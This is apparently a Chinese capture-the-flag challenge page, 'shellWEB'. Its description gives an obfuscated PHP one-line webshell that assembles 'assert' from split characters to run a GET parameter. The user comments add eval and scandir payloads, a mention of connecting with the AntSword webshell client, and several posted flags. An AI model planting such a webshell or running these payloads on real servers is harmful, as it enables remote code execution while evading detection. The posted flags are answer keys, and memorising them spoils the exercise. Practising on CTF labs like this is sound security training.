shellWEB 未解决

分数: 25 金币: 3
题目作者: harry
一  血: dotast
一血奖励: 1金币
解  决: 6515
提  示:
描  述:
送给大家一个过狗一句话 $poc="a#s#s#e#r#t"; $poc_1=explode("#",$poc); $poc_2=$poc_1[0].$poc_1[1].$poc_1[2].$poc_1[3].$poc_1[4].$poc_1[5]; $poc_2($_GET['s'])
评论
000ooo 9月前

?s=eval+($_POST['123'])

回复 2

ruien 10月前

答案就在描述里,上传的s参数如果是字符串会被当命令执行

回复 0

112356 10月前

flag{0aa5253236aa8d97368bd753cb3c4cf2}

回复 0

迷茫的三千面 10月前

flag{f790b1679ece8cfe8ce3fc425c30896b}

回复 0

星空 10月前

?s=eval($_POST["cmd"]),再用蚁剑连

回复 0

星空 10月前

?s=eval($_POST["cmd"])

回复 0

15824777912 11月前

flag{11393cf7e26fe81d89dc60b63d3a1f52}

回复 0

whitenul 11月前

flag{9fd11e2660d3ad1f535e9f1de957424a}

回复 0

InfoSec 11月前

这里的?s=print_r(scandir('./'))是一个GET请求参数,通过GET方式传递给服务器。当服务器执行上述代码时,会调用PHP函数scandir()来列出当前目录下的所有文件和文件夹,并通过print_r()函数将这些目录内容打印输出到页面上。

回复 1

17795946336 11月前

flag{287b3bef4cb9712a82e858a1ad413de8}

回复 0

WriteUp

image
harry

3 金币

评分(9)

解题动态

szb123 攻破了该题 1小时前
17361232956 攻破了该题 2小时前
皮蛋瘦肉粥 攻破了该题 2小时前
aaa1 攻破了该题 3小时前
初入CTF联盟 攻破了该题 5小时前
hahahahahahaha 攻破了该题 6小时前
GEcharacter 攻破了该题 6小时前
wujiayi 攻破了该题 10小时前
huangfeiyu 攻破了该题 11小时前
晚霞难掩秋色 攻破了该题 11小时前
Julia 攻破了该题 21小时前
hanzkj 攻破了该题 1天前
920917544 攻破了该题 1天前
codegod 攻破了该题 1天前
foxkiller 攻破了该题 1天前
desireart 攻破了该题 1天前
Ywctf 攻破了该题 1天前
orange2015 攻破了该题 1天前
刚哥glory 攻破了该题 1天前
2757547892 攻破了该题 1天前
问题反馈